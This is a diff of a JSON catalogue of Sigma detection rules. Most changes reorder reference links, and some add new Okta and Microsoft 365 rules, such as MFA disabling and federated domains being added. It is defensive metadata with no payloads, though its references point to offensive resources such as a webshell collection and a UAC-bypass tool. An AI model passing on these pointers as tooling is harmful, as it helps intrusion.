+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
+ "https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml"
 ],
 "tags": [
@@ -77422,8 +78773,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md",
 "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1",
+ "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl.yml"
 ],
 "tags": [
@@ -77755,8 +79106,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml"
 ],
@@ -77857,8 +79208,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md",
 "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1",
+ "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml"
 ],
 "tags": [
@@ -77904,8 +79255,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/",
 "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/",
+ "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml"
 ],
 "tags": [
@@ -78017,8 +79368,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.echotrail.io/insights/search/msbuild.exe",
 "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/",
+ "https://www.echotrail.io/insights/search/msbuild.exe",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"
 ],
 "tags": [
@@ -78075,8 +79426,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
 "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
 "https://ss64.com/bash/rar.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml"
 ],
@@ -78133,8 +79484,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/",
 "https://twitter.com/Hexacorn/status/1224848930795552769",
+ "http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml"
 ],
 "tags": [
@@ -78157,8 +79508,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/netero1010/TrustedPath-UACBypass-BOF",
 "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e",
+ "https://github.com/netero1010/TrustedPath-UACBypass-BOF",
 "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml"
 ],
@@ -78192,8 +79543,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
 "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
+ "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml"
 ],
 "tags": [
@@ -78470,8 +79821,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/harr0ey/status/992008180904419328",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/",
+ "https://twitter.com/harr0ey/status/992008180904419328",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml"
 ],
 "tags": [
@@ -78571,8 +79922,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx",
 "https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md",
+ "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml"
 ],
 "tags": [
@@ -78672,8 +80023,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml"
 ],
 "tags": [
@@ -78797,9 +80148,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en",
- "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml",
 "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
 "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
+ "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powertool.yml"
 ],
 "tags": [
@@ -78832,8 +80183,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/rikvduijn/status/853251879320662017",
 "https://twitter.com/felixw3000/status/853354851128025088",
+ "https://twitter.com/rikvduijn/status/853251879320662017",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"
 ],
 "tags": [
@@ -78866,8 +80217,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/0gtweet/status/1674399582162153472",
 "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/",
+ "https://twitter.com/0gtweet/status/1674399582162153472",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml"
 ],
 "tags": [
@@ -78900,9 +80251,9 @@
 "logsource.category": "antivirus",
 "logsource.product": "No established product",
 "refs": [
+ "https://www.nextron-systems.com/?s=antivirus",
 "https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448",
 "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619",
- "https://www.nextron-systems.com/?s=antivirus",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml"
 ],
 "tags": [
@@ -78960,8 +80311,8 @@
 "logsource.product": "No established product",
 "refs": [
 "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
- "https://twitter.com/mvelazco/status/1410291741241102338",
 "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
+ "https://twitter.com/mvelazco/status/1410291741241102338",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_printernightmare_cve_2021_34527.yml"
 ],
 "tags": [
@@ -79027,10 +80378,10 @@
 "logsource.category": "antivirus",
 "logsource.product": "No established product",
 "refs": [
- "https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797",
- "https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466",
- "https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424",
 "https://www.nextron-systems.com/?s=antivirus",
+ "https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424",
+ "https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466",
+ "https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml"
 ],
 "tags": [
@@ -79072,8 +80423,8 @@
 "logsource.category": "antivirus",
 "logsource.product": "No established product",
 "refs": [
- "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/",
 "https://www.nextron-systems.com/?s=antivirus",
+ "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml"
 ],
 "tags": [
@@ -79106,16 +80457,16 @@
 "logsource.category": "antivirus",
 "logsource.product": "No established product",
 "refs": [
+ "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection",
 "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection",
 "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection",
- "https://www.nextron-systems.com/?s=antivirus",
- "https://github.com/tennc/webshell",
- "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection",
- "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection",
- "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection",
 "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection",
+ "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection",
+ "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection",
+ "https://github.com/tennc/webshell",
+ "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection",
+ "https://www.nextron-systems.com/?s=antivirus",
 "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection",
- "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml"
 ],
 "tags": [
@@ -79149,11 +80500,11 @@
 "logsource.product": "No established product",
 "refs": [
 "https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c",
+ "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7",
+ "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d",
+ "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045",
 "https://www.nextron-systems.com/?s=antivirus",
 "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916",
- "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d",
- "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7",
- "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_ransomware.yml"
 ],
 "tags": [
@@ -79230,8 +80581,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://sec.okta.com/fastpassphishingdetection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_fastpass_phishing_detection.yml"
 ],
@@ -79265,9 +80616,9 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml"
 ],
 "tags": "No established tags"
@@ -79275,6 +80626,74 @@
 "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0",
 "value": "Okta Security Threat Detected"
 },
+ {
+ "description": "Detects when Okta identifies new activity in the Admin Console.",
+ "meta": {
+ "author": "kelnage",
+ "creation_date": "2023/09/07",
+ "falsepositive": [
+ "Whenever an admin starts using new features of the admin console."
+ ],
+ "filename": "okta_new_behaviours_admin_console.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "okta",
+ "refs": [
+ "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_new_behaviours_admin_console.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1078.004"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9",
+ "value": "Okta New Admin Console Behaviours"
+ },
+ {
+ "description": "Detects when an Okta end-user reports activity by their account as being potentially suspicious.",
+ "meta": {
+ "author": "kelnage",
+ "creation_date": "2023/09/07",
+ "falsepositive": [
+ "If an end-user incorrectly identifies normal activity as suspicious."
+ ],
+ "filename": "okta_suspicious_activity_enduser_report.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "okta",
+ "refs": [
+ "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_suspicious_activity_enduser_report.yml"
+ ],
+ "tags": [
+ "attack.resource_development",
+ "attack.t1586.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3d52e51e-f6db-4719-813c-48002a99f43a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "07e97cc6-aed1-43ae-9081-b3470d2367f1",
+ "value": "Okta Suspicious Activity Reported by End-user"
+ },
 {
 "description": "Detects when an user account is locked out.",
 "meta": {
@@ -79288,8 +80707,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml"
 ],
 "tags": [
@@ -79309,6 +80728,40 @@
 "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a",
 "value": "Okta User Account Locked Out"
 },
+ {
+ "description": "Detects when a new identity provider is created for Okta.",
+ "meta": {
+ "author": "kelnage",
+ "creation_date": "2023/09/07",
+ "falsepositive": [
+ "When an admin creates a new, authorised identity provider."
+ ],
+ "filename": "okta_identity_provider_created.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "okta",
+ "refs": [
+ "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_identity_provider_created.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1098.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "969c7590-8c19-4797-8c1b-23155de6e7ac",
+ "value": "Okta Identity Provider Created"
+ },
 {
 "description": "Detects when a API Token is revoked.",
 "meta": {
@@ -79322,8 +80775,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml"
 ],
 "tags": [
@@ -79346,8 +80799,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml"
 ],
 "tags": [
@@ -79370,8 +80823,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml"
 ],
 "tags": [
@@ -79394,8 +80847,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml"
 ],
 "tags": [
@@ -79418,8 +80871,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assignment_created.yml"
 ],
 "tags": [
@@ -79442,8 +80895,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml"
 ],
 "tags": [
@@ -79476,8 +80929,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml"
 ],
 "tags": [
@@ -79500,9 +80953,9 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm",
 "https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data",
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_password_in_alternateid_field.yml"
 ],
 "tags": [
@@ -79535,8 +80988,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml"
 ],
 "tags": [
@@ -79559,8 +81012,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml"
 ],
 "tags": [
@@ -79583,8 +81036,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml"
 ],
 "tags": [
@@ -79621,8 +81074,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml"
 ],
 "tags": [
@@ -79632,6 +81085,73 @@
 "uuid": "1667a172-ed4c-463c-9969-efd92195319a",
 "value": "Okta Policy Modified or Deleted"
 },
+ {
+ "description": "Detects when an Okta user session starts where the user is behind an anonymising proxy service.",
+ "meta": {
+ "author": "kelnage",
+ "creation_date": "2023/09/07",
+ "falsepositive": [
+ "If a user requires an anonymising proxy due to valid justifications."
+ ],
+ "filename": "okta_user_session_start_via_anonymised_proxy.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "okta",
+ "refs": [
+ "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_session_start_via_anonymised_proxy.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.006"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "bde30855-5c53-4c18-ae90-1ff79ebc9578",
+ "value": "Okta User Session Start Via An Anonymising Proxy Service"
+ },
+ {
+ "description": "Detects disabling of Multi Factor Authentication.",
+ "meta": {
+ "author": "Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)",
+ "creation_date": "2023/09/18",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "microsoft365_disabling_mfa.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "m365",
+ "refs": [
+ "https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_disabling_mfa.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1556"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "60de9b57-dc4d-48b9-a6a0-b39e0469f876",
+ "value": "Disabling Multi Factor Authentication"
+ },
 {
 "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.",
 "meta": {
@@ -79793,24 +81313,24 @@
 "value": "Activity Performed by Terminated User"
 },
 {
- "description": "Alert for the addition of a new federated domain.",
+ "description": "Detects the addition of a new Federated Domain.",
 "meta": {
- "author": "@ionsor",
+ "author": "Splunk Threat Research Team (original rule), '@ionsor (rule)'",
 "creation_date": "2022/02/08",
 "falsepositive": [
 "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider."
 ],
- "filename": "microsoft365_new_federated_domain_added.yml",
+ "filename": "microsoft365_new_federated_domain_added_exchange.yml",
 "level": "medium",
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
- "https://o365blog.com/post/aadbackdoor/",
 "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
 "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf",
+ "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
+ "https://o365blog.com/post/aadbackdoor/",
 "https://www.sygnia.co/golden-saml-advisory",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added_exchange.yml"
 ],
 "tags": [
 "attack.persistence",
@@ -79827,7 +81347,7 @@
 }
 ],
 "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339",
- "value": "New Federated Domain Added"
+ "value": "New Federated Domain Added - Exchange"
 },
 {
 "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.",
@@ -80056,6 +81576,40 @@
 "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69",
 "value": "Microsoft 365 - Potential Ransomware Activity"
 },
+ {
+ "description": "Detects the addition of a new Federated Domain.",
+ "meta": {
+ "author": "Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)",
+ "creation_date": "2023/09/18",
+ "falsepositive": [
+ "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider."
+ ],
+ "filename": "microsoft365_new_federated_domain_added_audit.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "m365",
+ "refs": [
+ "https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/",
+ "https://o365blog.com/post/aadbackdoor/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added_audit.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1136.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "58f88172-a73d-442b-94c9-95eaed3cbb36",
+ "value": "New Federated Domain Added"
+ },
 {
 "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content",
 "meta": {
@@ -80240,8 +81794,8 @@
 "logsource.category": "No established category",
 "logsource.product": "github",
 "refs": [
- "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization",
